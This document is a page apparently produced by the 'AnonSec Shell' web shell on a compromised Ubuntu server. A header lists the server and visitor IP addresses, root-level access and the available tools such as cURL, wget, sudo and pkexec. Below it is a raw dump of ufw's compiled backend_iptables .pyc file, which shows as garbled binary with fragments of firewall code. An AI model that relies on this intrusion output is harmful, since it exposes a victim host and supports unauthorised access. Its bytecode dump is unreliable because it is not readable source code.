AnonSec Shell
Server IP : 209.38.156.173  /  Your IP : 216.73.216.122   [ Reverse IP ]
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux lakekumayuhotel 5.15.0-136-generic #147-Ubuntu SMP Sat Mar 15 15:53:30 UTC 2025 x86_64
User : root ( 0)
PHP Version : 8.1.2-1ubuntu2.22
Disable Function : NONE
Domains : 2 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /lib/python3/dist-packages/ufw/__pycache__/


Current File : /lib/python3/dist-packages/ufw/__pycache__/backend_iptables.cpython-310.pyc
o

�Faj��@s�dZddlZddlZddlZddlZddlZddlZddlmZm	Z	ddl
mZmZm
Z
mZmZmZddlZGdd�dejj�ZdS)z-backend_iptables.py: iptables backend for ufw�N)�UFWError�UFWRule)�warn�debug�msg�cmd�cmd_pipe�	_findpathc@s�eZdZdZd+dd�Zdd�Zdd�Zd	d
�Zd,dd
�Zdd�Z	dd�Z
dd�Zdd�Zdd�Z
dd�Zdd�Zd-dd�Zd.dd �Zd!d"�Zd-d#d$�Zd%d&�Zd'd(�Zd)d*�ZdS)/�UFWBackendIptableszInstance class for UFWBackendNcCs�dtjjd|_||_||_i}ttjj|�}tj	�
|d�|d<tj	�
|d�|d<tj	�
|d�|d<tj	�
|d	�|d
<tj	�
|d�|d<tj	�
|d
�|d<tj	�
ttjj|�d�|d<tjj
j|d||||d�ggggd�|_dD]C}d}|dkr�|��r�||7}n|dkr�qsdD]}dD]}	d|||	f}
|j|�|
�q�q�|jd�|d�|jd�|d�qsgd�|_d|_dS) z!UFWBackendIptables initializationz# z
_comment #zufw/user.rules�ruleszufw/before.rules�before_ruleszufw/after.rules�after_ruleszufw/user6.rules�rules6zufw/before6.rules�
before6_ruleszufw/after6.rules�after6_ruleszufw-init�init�iptables)�rootdir�datadir)�before�user�after�misc)�4�6�ufwr)rrr��input�output�forwardz%s-%s-logging-%srz
-logging-denyz-logging-allow)�-m�limit�--limitz3/minute�-j�LOG�--log-prefixz[UFW LIMIT BLOCK]N)r�common�programName�comment_strrrr	�
config_dir�os�path�join�	state_dir�backend�
UFWBackend�__init__�chains�use_ipv6�append�ufw_user_limit_log�ufw_user_limit_log_text)�self�dryrunrr�filesr)�ver�chain_prefix�loc�target�chain�r>�6/usr/lib/python3/dist-packages/ufw/backend_iptables.pyr0 sD��
�

zUFWBackendIptables.__init__cCsbtd�}|jddkr|d7}|S|jddkr|d7}|S|jddkr+|d7}|S|d	7}|S)
zGet current policyz
New profiles:�default_application_policy�acceptz allow�dropz deny�rejectz rejectz skip)�_�defaults)r6�rstrr>r>r?�get_default_application_policyPs���z1UFWBackendIptables.get_default_application_policyc
	Cs|js�|dkr|dkr|dkrtd�|}t|��|dkr/|dkr/|dkr/td�|}t|��d	}|dkr8d
}n|dkr>d}d}d}|dkrbz|�|jd
d|d�Wnty\�wd}d}n;|dkr�z|�|jd
d|d�Wnty|�wd}d}nz|�|jd
d|d�Wnty��wd}d}t�d|�}|jd|jdfD]F}ztj	�
|�}	Wnty��w|	d}
|	dD]}|�|�r�tj	�|
|�
||��q�tj	�|
|�q�ztj	�|	�Wq�ty��wtd�||d�}|td�7}|S)zSets default policy of firewall�allow�denyrCzUnsupported policy '%s'�incoming�outgoing�routedz%Unsupported policy for direction '%s'�INPUT�OUTPUT�FORWARD�rEzDEFAULT_%s_POLICYz"ACCEPT"z	UFW BLOCKz	UFW ALLOWz"REJECT"z"DROP"r
r�tmp�origz5Default %(direction)s policy changed to '%(policy)s'
)�	direction�policyz*(be sure to update your rules accordingly))r7rDr�set_defaultr8�	Exception�re�compiler�util�
open_files�search�
write_to_file�sub�close_files)
r6rTrS�err_msgr=�old_log_str�new_log_str�pat�f�fns�fd�linerFr>r>r?�set_default_policy^s���������
��z%UFWBackendIptables.set_default_policycCs�|jrdtd�}|dtd�7}|S|��gd�}g}g}|dkr1|�d�gd�}gd�}n�|d	kr{d
D]}|�d|�|�d|�q7dD]}|�d
|�|�d
|�qJdD]}|�d|�|�d|�q]dD]	}|�d|�qpn�|dkr�dD]}|�d|�|�d|�q�n�|dkr�dD]}|�d|�|�d|�q�|jddr�|�d�|�d�|jddr�|�d�|�d�n`|d kr�dD]}|�d!|�|�d"|�q�nH|d#k�r-dD],}|�d$|�|�d%|�|�d&|�|�d'|�|�d(|�|�d)|�q�|�d*�|�d+�|�d,�|�d-�d.|}|D]H}d/|v�rW|�d/�\}	}|d0|	7}t|jg||d|	g�\}
}n
t|jg||g�\}
}||7}|dk�rq|d17}|
d2k�rzt|���q3|dk�s�|�	��r�|d37}|D]H}d/|v�r�|�d/�\}	}|d0|	7}t|jg||d|	g�\}
}n
t|j
g||g�\}
}||7}|dk�r�|d17}|
d2k�r�t|���q�|S)4z'Show current running status of firewall�> zChecking raw iptables
zChecking raw ip6tables
)�-nz-vz-x�-L�rawz-t)�filter�nat�manglerk)rlrnrk�builtins)rMrOrNz	filter:%s)�
PREROUTINGrMrOrN�POSTROUTINGz	mangle:%s)rprNzraw:%s)rprqrNznat:%sr)rrrz
ufw-before-%szufw6-before-%sr�ufw-user-%s�ufw6-user-%sr!rzufw-user-limit-accept�ufw-user-limitrzufw6-user-limit-accept�ufw6-user-limitrzufw-after-%sz
ufw6-after-%s�loggingzufw-before-logging-%szufw6-before-logging-%szufw-user-logging-%szufw6-user-logging-%szufw-after-logging-%szufw6-after-logging-%szufw-logging-allowzufw-logging-denyzufw6-logging-allowzufw6-logging-denyzIPV4 (%s):
�:z(%s) �
rz

IPV6:
)r7rD�initcapsr3�caps�splitrrrr2�	ip6tables)r6�
rules_type�out�args�items�items6�c�b�i�t�rcrQr>r>r?�get_running_raw�s�

��



��





 

�
 

�z"UFWBackendIptables.get_running_rawFc$Cs�d}|jrdtd�}|��r|dtd�7}|Std�}dD]@}t|jdd|d	g�\}}|d
kr8td�S|dkrDt|d
|��|��r_t|jdd|d	g�\}}|dkr_t|d��qd}d}	d}
|j|j}d
}i}
|D�]�}d}i}d}d}|s�|j	dks�|j
dkr�d}|��}||
vr�td|�qrd|
|<dD�]�}d||<d}d}|dkr�|j
}|s�|j	dkr�|j	}|jr�|dkr�|d7}n |j}n|j}|s�|j
dkr�|j
}|jr�|dkr�|d7}n|j}|dkr�|dkr�|||<|dk�r�||dk�r|||<n
||d|7<|�r#|jdk�r#||d|j7<|�r�|dk�rU|j	dk�rU||d|j	7<|j�rM|dk�rM||d7<||d7<|dk�r�|j
dk�r�||d|j
7<|j�r||dk�r|||d7<||d7<|dk�r�|dk�s�|dk�r�d||<|�r�|jdk�r�|j
|jk�r�|j|jk�r�||d|j7<|dk�r�||d7<n;|�r�|jdk�r�|j|jk�r�||d|j7<n|j�r|jdk�r|j
dk�rd||v�r||d7<|j�r3|dk�r|jdk�r||d|j7<|dk�r2|jdk�r2||d|j7<q�|dk�rI|jdk�rI||d|j7<|dk�r_|jdk�r_||d|j7<q�g}d}|j�sp|j��d k�r�|j�r||�|j���|�r�|jd k�r�|�|j�t|�dk�r�d!d"�|�}|�r�|d#|7}|j��}|j�r�d$}|jd%k�r�|j�s�|�s�|�s�d}d}|jdk�r�d&|��}|d'|dd�|j��|g�|d||f7}|�r�||7}n|j�r�|
|7}
n|jd k�r|	|7}	n||7}|d
7}qr|dk�s|	dk�s|
dk�r�d(}|�r!|d)7}td*�}td+�}td,�}d-}||||f}|�r=|d)7}||d.t|�d.t|�d.t|�f7}||7}|dk�r_||7}|dk�ro|	dk�ro|td/�7}|	dk�rx||	7}|dk�r�|
dk�r�|td/�7}|
dk�r�||
7}|}|�r�|� �\} }!td0�|�!�|�!d1�|�!d2d�d3�}"|�"�}#td4�|!|"|#|d5�Std6�|S)7zShow ufw managed rulesrPrhzChecking iptables
zChecking ip6tables
�problem runningrrjrrri�zStatus: inactiverz iptables: %s
rs�
 ip6tablesTFzSkipping found tuple '%s')�dst�srcr�z::/0� (v6)z	0.0.0.0/0�any� �/z (%s�)r��Anywherez on %sr~z (%s)z, z[%2d] �FWD�inz # %sz%-26s %-12s%-26s%s%s
z

z     �To�From�Actionz%-26s %-12s%s
�-rxzCDefault: %(in)s (incoming), %(out)s (outgoing), %(routed)s (routed)rr)r�r~rLz0Status: active
%(log)s
%(pol)s
%(app)s%(status)s)�log�pol�app�statuszStatus: active%s)#r7rDr2rrrr|rr�dapp�sapp�
get_app_tuplerr��v6�dportr��sport�protocolr�interface_in�
interface_out�logtyperS�lowerr3�lenr,�upper�comment�get_comment�action�get_loglevel�_get_default_policyrG)$r6�verbose�
show_countr~r_rSr��out6�s�str_out�str_rter�count�	app_rules�r�tmp_str�location�tupl�
show_protor;�portrQ�attribs�
attrib_str�dir_strr(�full_str�str_to�str_from�
str_action�rules_header_fmt�rules_header�level�logging_str�
policy_str�app_policy_strr>r>r?�
get_statussz
�
��

��



�� ��
��
��






��


�����zUFWBackendIptables.get_statuscCs�|jr
tdtd��dSg}|�|jd�|jdur7|jdur7|�d�|�|j�|�d�|�|j�|�d�t|�\}}|dkrPtd	|�}t|��dS)
zStop the firewallrh�running ufw-initrN�	--rootdir�	--datadirz
force-stopr�problem running ufw-init
%s)	r7rrDr3r8rrrr�r6rr�r~r_r>r>r?�
stop_firewall�s


�z UFWBackendIptables.stop_firewallcCs(|jr
tdtd��dSg}|�|jd�|jdur7|jdur7|�d�|�|j�|�d�|�|j�|�d�t|�\}}|dkrPtd	|�}t|��d
|j	vsa|j	d
t
|j���vryz|�
d�WdStyxtd�}t|��wz|�|j	d
�WdSty�td
�}t|��w)zStart the firewallrhr�rNr�r��startrr��loglevel�lowzCould not set LOGLEVELzCould not load logging rules)r7rrDr3r8rrrrrE�list�	loglevels�keys�set_loglevelrV�update_loggingr�r>r>r?�start_firewall�s8



��z!UFWBackendIptables.start_firewallcCs�|jrdS|��d}|j}|rd}|j}dD]7}|dks!|dkr5|r+|jdds+q|s5|jdds5qt|d	d
|d|g�\}}|dkrNtd
�dSqdS)zCheck if all chains existFr�ufw6)rrrr!�limit-acceptr!r�rrrirjz-user-rz_need_reload: forcing reloadT)r7ryrr|rzrr)r6r��prefix�exer=r�r~r>r>r?�_need_reloads(�zUFWBackendIptables._need_reloadcCs�td�}|jrtd�|��rtd�dSdS|��rwz|jdD]}|�|d|g�|�|d|g�q!Wnty@t|��wt	d|j
dg|jd	g�\}}|d
krZt|d��|��ryt	d|j
dg|jd	g�\}}|d
kr{t|d
��dSdSdS)zReload firewall rules filer�z> | iptables-restorez> | ip6tables-restorer�-F�-Z�catrrirz	 iptablesrr�N)
rDr7rr2�
is_enabledr1�
_chain_cmdrVrrr8�iptables_restore�ip6tables_restore)r6r_r�r�r~r>r>r?�_reload_user_rules:s:������z%UFWBackendIptables._reload_user_rulescCs8g}t�d�}t�d�}t�d�}|�|�rK|�|�rA|�|�r.|�|�d|�d|���n	|�|�d|��|�|�d|��n|�|�d|��n|�|�t�d�}t�d	�}	t�d
�}
d}t|�D]v\}}
|�|
�r�|�d|
���}|��d
krd}n|��dkr�d}nd}d||f}|	�|
�s�d|}|�d|
�||<|�||�d|d||
��|�||
�d|d||�d|
���|�||
�d|d||�d||
���qet�d�}t|�D]4\}}
|�|
��r|�d|
�}|�d|d|
�}|�d|d|
�}|||<|�||�|�||�q�|S) z5Return list of iptables rules appropriate for sendingz-p all zport z-j (REJECT(_log(-all)?)?)z-p tcp z-j \1 --reject-with tcp-resetz-p udp rPz(.*)-j ([A-Z]+)_log(-all)?(.*)z-j [A-Z]+_log-allz(-A|-D) ([a-zA-Z0-9\-]+)z'-m limit --limit 3/min --limit-burst 10�\2rA�ALLOWr!�LIMIT�BLOCKz"%s -j LOG --log-prefix "[UFW %s] "z-m conntrack --ctstate NEW z	\1-j \2\4z\1-j z-user-logging-z\1 z\1-j RETURN�\1z	 -j LIMITz+ -m conntrack --ctstate NEW -m recent --setzL -m conntrack --ctstate NEW -m recent --update --seconds 30 --hitcount 6 -j z-user-limitz -j z-user-limit-accept)	rWrXr[r3r]�	enumerate�stripr��insert)r6�fruler��suffix�snippets�	pat_proto�pat_port�
pat_reject�pat_log�
pat_logall�	pat_chain�
limit_argsr�r�rT�lstr�	pat_limit�tmp1�tmp2�tmp3r>r>r?�_get_rules_from_formattedVs�






��




�
�����������
�����z,UFWBackendIptables._get_rules_from_formattedc	Cs�g}|�|||�}t�d�}t|�D]8\}}|�|�d|����|�|�rJ||�d�||�|�d|��dd��|||�d|���7<q|S)z_Return list of iptables rules appropriate for sending as arguments
           to cmd()
        z(.*) --log-prefix (".* ")(.*)r�r%r��"rPz\3)	r�rWrXr�r3r]r{�match�replace)	r6r�r�r�r��str_snippetsrbr�r�r>r>r?�_get_lists_from_formatted�s

�z,UFWBackendIptables._get_lists_from_formattedcCs�|jdg}|��r|�|jd�|D�]�}ztj�|�}Wnty0td�|}t|��wt	�
d�}t	�
d�}t	�
d�}|D�]z}|}	d}
d|vrX|�d�\}	}|��}
|�
|	��r�|�d|	�}t	�d	|���}
t|
�d
ksxt|
�dkr�td�|}t|�qBd
}d}d}t|
�dks�t|
�dk�rtd�|}|
d�d�d}d|
dv�rd|
dvr�|�|
d�r�|�|
d�r�|
d�d�d�d�d}|
d�d�d�d�d}n'|
d�d�r�|
d�d�d}n|
d�d�r�|
d�d�d}nt|�qBz�|
d}d}d|v�rd}|�d�d}t|
�dk�r7t||
d|
d|
d|
d|
d|||
�	}n;t||
d|
d|
d|
d|
d|||
�	}t	�
d�}|
d
d k�rb|�d!|
d
�|_|
dd k�rr|�d!|
d�|_|dk�r}|�d
|�|dk�r�|�d"|�Wnt�y�td#�|}t|�YqBw||jdk�r�|�d�|j�|�qB|�d�|j�|�qB|��qd$S)%z$Read in rules that were added by ufwrrzCouldn't open '%s' for readingz^### tuple ###\s*zin_\w+zout_\w+rPz	 comment=z\s+��	z)Skipping malformed tuple (bad length): %sr��z$Skipping malformed tuple (iface): %s���rDr�!�r��in_�out_FrwT�����%20r�r�r~zSkipping malformed tuple: %sN)r8r2r3rrY�open_file_readrVrDrrWrXr{r�rr]r�rr[�	partition�
startswithrr�r��
set_interface�set_v6rr�close)r6�rfnsrcrRr_�	pat_tuple�pat_iface_in�
pat_iface_out�	orig_linerfr��hexr�rQ�wmsg�dtyper�r�r�r�rule�	pat_space�warn_msgr>r>r?�_read_rules�s�
�



������
��


���

�
�zUFWBackendIptables._read_rulescCs&|jd}|r|jd}t�|tj�std|�}t|��ztj�|�}Wnt	y-�w|�
�d}|j}|r>d}|j}|j
rGtj��}n|d}tj�|d�tj�|d|d	�tj�|d|d
�tj�|d|d�tj�|d|d�tj�|d|d
�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�tj�|d|d�|dkr�|jdd�s|dk�r|jdd�rtj�|d|d�tj�|d|d�tj�|d�|D�]	}|j}	|j�r3d|j}	|jdk�r@|	d|j7}	d}
|jdk�rR|jdk�rR|j}
n0|jdk�rg|jdk�rgd |j|jf}
n|jdk�rx|
d!|j|jf7}
n
|
d!|j|jf7}
|jdk�r�|jdk�r�d"|	|j|j|j|j|j|
f}|j dk�r�|d#|j 7}tj�||d$�nGt!�"d%�}d&}
|j�r�|�#d'|j�}
d&}|j�r�|�#d'|j�}d(|	|j|j|j|j|j|
||
f	}|j dk�r�|d#|j 7}tj�||d$�d)}|j�rd*}n|jd+k�r
d,}d-||f}d.||�$�f}|�%|||�D]
}tj�||��q"�q$tj�|d/�tj�|d0�z
|�&|j'd1�}Wn	t	�yP�w|D]2\}}}t(|�d2k�rh|d2d3k�rh�qS|�)|d&��r�tj�|d%�*|��+d4d5��+d6d7�d$��qStj�|d8�|dk�r�|jdd�s�|dk�r�|jdd�r�tj�|d9�|j'd1d:k�r�tj�|d;|d<d%�*|j,�d=|j-d>�tj�|d;|d?�tj�|d;|d@�tj�|dA�tj�|dB�z|j
�rtj�.|dC�WdDStj�.|�WdDSt	�y�w)Ez.Write out new rules to file to user chain filerrz'%s' is not writablerr�rQz*filter
rwz-user-input - [0:0]
z-user-output - [0:0]
z-user-forward - [0:0]
z-before-logging-input - [0:0]
z-before-logging-output - [0:0]
z -before-logging-forward - [0:0]
z-user-logging-input - [0:0]
z-user-logging-output - [0:0]
z-user-logging-forward - [0:0]
z-after-logging-input - [0:0]
z-after-logging-output - [0:0]
z-after-logging-forward - [0:0]
z-logging-deny - [0:0]
z-logging-allow - [0:0]
r!rrz-user-limit - [0:0]
z-user-limit-accept - [0:0]
z### RULES ###
zroute:rPrDzin_%s!out_%sz%s_%sz#
### tuple ### %s %s %s %s %s %s %sz comment=%srxr�r�rz)
### tuple ### %s %s %s %s %s %s %s %s %srrr~r�
%s-user-%sz	-A %s %s
z
### END RULES ###
z
### LOGGING ###
r�r�-D�[z"[z] z] "z### END LOGGING ###
z
### RATE LIMITING ###
�offz-A z-user-limit z "z "
z-user-limit -j REJECT
z-user-limit-accept -j ACCEPT
z### END RATE LIMITING ###
zCOMMIT
FN)/r8r*�access�W_OKrDrrrYrZrVryrrr7�sys�stdout�filenor\rzr�rr�r�r�rSr�r�r�r�r�r�r�r�rWrXr]�format_ruler��_get_logging_rulesrEr�rr,rr4r5r^)r6r��
rules_filer_rdr:rrer�r��ifaces�tstrr r�r��chain_suffixr=�rule_strr��lrules_tr��qr>r>r?�_write_rulessT

����������������

��
��������
��
�������zUFWBackendIptables._write_rulesTc	Csn|��d}|jr)|��std�}t|��|jdkr(|jdds(td�|jSn|jdkr<|jdds<td�|jS|jrQ|jdkrQ|jd	krQtd
�}t|��g}d}d}|j	}|j
}	|jrv|jdkrs|jdkso|j
dkrstd
�S|j}|	dks�|	t|�kr�td�|	}t|��|	dkr�|jr�td�}t|��|	t|�kr�td�|	}t|��z|��Wnty��wd}
d}d}d}
|D]�}z|��Wnty��w|j|j|j|j
f}|
|	k�r|
ddkr�|
ddkr�|
dk�s|ddk�r|ddk�s|
|k�rd}|�|���d}
n|	d7}	|}
|
d7}
t�||�}|dk�r+|d7}|dk�rD|�sD|�sDd}|j�sC|�|���q�|dk�rV|j�rV|jdk�rVd}q�|dk�rn|j�sn|�snd}d}|�|���q�|�|�q�|�r�|dk�r�td�}|j�r�|d7}|Sn?|�s�|j�s�|�|���|�s�|j�r�|j�s�td�}|j�r�|d7}|S|�r�|j�s�|�s�td�}|j�r�|d7}|S|j�r�||_n||_	z|�|j�Wnt�y��t�y�td�}t|�Ynwtd�}|j�rtd�}|���r5|j�s5d}|�s|�|j��s|�rPd}|�r(|td�7}n|td �7}|j�r6|d7}|�rIz|��WnRt�yH�w|td!�7}nB|�r�|j�r�d"}td#�}|j�re|d7}|�r{z|��Wn	t�yw�wd}n|td!�7}n|�s�|�s�|j�s�d$}td%�}|dk�r5|j}d&}|j�r�|j }d'}|d7}d(}|j!�r�d)}n|j"d*k�r�d+}d,||f}td-�}t#|d.|d/g�\}}|dk�r�t|��d0|||�$�f}t%�&d1�}|�'|||�D]H}t#|g|�\}}|dk�rt(|t)j*�t|�|d$k�r3|�+d2�,|���r3|�-d3d2�,|��}t#|d"|d4d5g�\}}|dk�r3t.d6|��q�|S)7aXUpdates firewall with rule by:
        * appending the rule to the chain if new rule and firewall enabled
        * deleting the rule from the chain if found and firewall enabled
        * inserting the rule if possible and firewall enabled
        * updating user rules file
        * reloading the user rules file if rule is modified
        rPz)Adding IPv6 rule failed: IPv6 not enabledr!rz#Skipping unsupported IPv6 '%s' rulerz#Skipping unsupported IPv4 '%s' rule�udp�tcpz/Must specify 'tcp' or 'udp' with multiple portsFz1.4z:Skipping IPv6 application rule. Need at least iptables 1.4rzInvalid position '%d'z Cannot specify insert and deletez#Cannot insert rule at position '%d'r�)rPrPrPrPr	r
T���z Skipping inserting existing ruler�z"Could not delete non-existent rulezSkipping adding existing rulezCouldn't update rules filez
Rules updatedzRules updated (v6)z
Rule insertedzRule updatedz (skipped reloading firewall)r$zRule deleted�-Az
Rule addedrr�rrr~rr#�!Could not update running firewallrjriz%s %s %sz(-A +)(ufw6?-user-[a-z\-]+)(.*)r�r�r#�RETURNzFAILOK: -D %s -j RETURN)/ryr�r2rDrr�rz�multir�r�position�iptables_versionr�r�rr��remove�	normalizerVr�r�r3�dup_rulerrr�r7r5r�r�r�rr|rrSrr,rWrXrrr)�stderrr[r,r]r)r6r�allow_reloadrFr_�newrules�found�modifiedrr=r��inserted�matches�lastr��current�ret�flagr�r:r1r=r�r~r2r�r�r�r>r>r?�set_rule�sZ
�
��
"

�
����


�

�zUFWBackendIptables.set_rulec
Cstg}g}|r
|j}n|j}|��}|�|�|��|��}|D]}|��}|��|��}	|	|kr7|�|�q |S)z@Return a list of UFWRules from the system based on template rule)rrrArr@r�r3)
r6�templater�rr��normr�r�rQ�	tmp_tupler>r>r?�get_app_rules_from_system�s"

�z,UFWBackendIptables.get_app_rules_from_systemcCs\|j}|�d�r|j}t|g|�\}}|dkr,td|�}|r(td|�dSt|��dS)zPerform command on chainr�rzCould not perform '%s'zFAILOK: N)rrr|rrDrr)r6r=r�fail_okr�r�r~r_r>r>r?r��s
�zUFWBackendIptables._chain_cmdc		Csx|jrdS|��g}z|�|�}Wnty�wz|jdd�|jdd�Wnty1�tyAtd�}t|�Ynw|��sHdStd�}|jd|jd|jd	|jd
D]}z|�	|d|dg�Wq`tyxt|��wz$|jd|jd	|jd
D]}|�	|d
|g�|�	|d|g�q�Wnty�t|��w|D]B\}}}d}t
|�dkr�|ddkr�d}z"|dkr�t
|�dkr�|j	|dg|dd�dd�|�	|||�Wq�ty�t|��wdD]I}|jddr�|dk�s|jdd�r9|dk�r9|j	|d|g|j|j
dgdd�|jddk�r9|j	|d|g|j|j
dgdd�q�dS)z#Update loglevel of running firewallNF)r�Tz&Couldn't update rules file for loggingr:rrrrrjrir�r�rr$�delete_firstr�)rR)rtrur!rrtrrur�r�r&�-I)r7ryr-rVr5rrDr�r1r�r�rzr4r5rE)	r6r��rules_tr_r�r�r4rRr=r>r>r?r��s�����������
�
���
����z!UFWBackendIptables.update_loggingc	Cs�g}|t|j���vrtd�|}t|��|dkr/|jdD]}|�|d|ddgdg�q|S|jdD]}|�|d|ddgd	g�q4gd
�}|j||jdk�rg}|j||jdkr`|}|jd
D]I}dD]D}|�|�r�|�|�dks~|�|�dkr�d}|�|d|ddd|g|d	g�qi|j||jdkr�d}|�|d|ddd|g|d	g�qiqeg}|j||jdkr�|}|jdD]S}|�d�r�d}n9|�d��rd}|j||jdkr�|�|d|ddddddg|d	g�n|�|d|ddddddddg
|d	g�|�|d|ddd|g|d	g�q�|j||jdk�r\g}|j||jdk�r0|}|j||jdk�rAgd�|}d }|jd!D]}|�|d|ddd|g|d	g��qH|S)"z%Get rules for specified logging levelzInvalid log level '%s'r&rrTr#r;rSr$rP)r r!r"z3/minz
--limit-burst�10r��highrrrCrIz[UFW BLOCK] r9r$r%�mediumz[UFW ALLOW] rrHr �	conntrack�	--ctstate�INVALIDz[UFW AUDIT INVALID] �full)r rYrZ�NEWz[UFW AUDIT] r)	r�r�r�rDrr1r3�endswithr�)	r6r�rUr_r�r��largsr�r�r>r>r?r-s�
��������
�����������
�z%UFWBackendIptables._get_logging_rulesc
Cs�d}ttjj|j�}g}|jD]2}|j|�d�sq|�|j|�tj	�
|dtj	�|j|��}tj	�|�sAt
d�|}t|��qt�d�}|D]}d||f}tj	�|�rat
d�|}t|��qI|D]}d||f}|t
d�tj	�|�|d	�7}t�||�qd|D]]}d||f}t�tj	�
|dtj	�|��tj	�|��t�||�zt�|�}	|	tj}
Wnty�t
d
�|}t|�Yq�w|
tj@r�|t
d�|7}q�|
tj@r�|t
d�|7}q�|S)
zReset the firewallrPz.rulesrzCould not find '%s'. Abortingz
%Y%m%d_%H%M%Sz%s.%sz'%s' already exists. Abortingz"Backing up '%(old)s' to '%(new)s'
)�old�newzCouldn't stat '%s'zWARN: '%s' is world writablezWARN: '%s' is world readable)r	rr&�	share_dirrr8r^r3r*r+r,�basename�isfilerDr�time�strftime�exists�rename�shutil�copy�dirname�copymode�stat�ST_MODErVr�S_IWOTH�S_IROTH)r6�resrb�allfilesr��fnr_�extr`�statinfo�moder!r>r>r?�resetksb

��
��
�
�
�

�zUFWBackendIptables.reset)NN)FF)F)T)�__name__�
__module__�__qualname__�__doc__r0rGrgr�r�r�r�r�r�r�rr"r5rMrQr�r�r-rwr>r>r>r?r
s0
0K
]f!D
e
*i

JZr
)r{r*rWrirmr)re�
ufw.commonrr�ufw.utilrrrrrr	�ufw.backendrr.r/r
r>r>r>r?�<module>s 
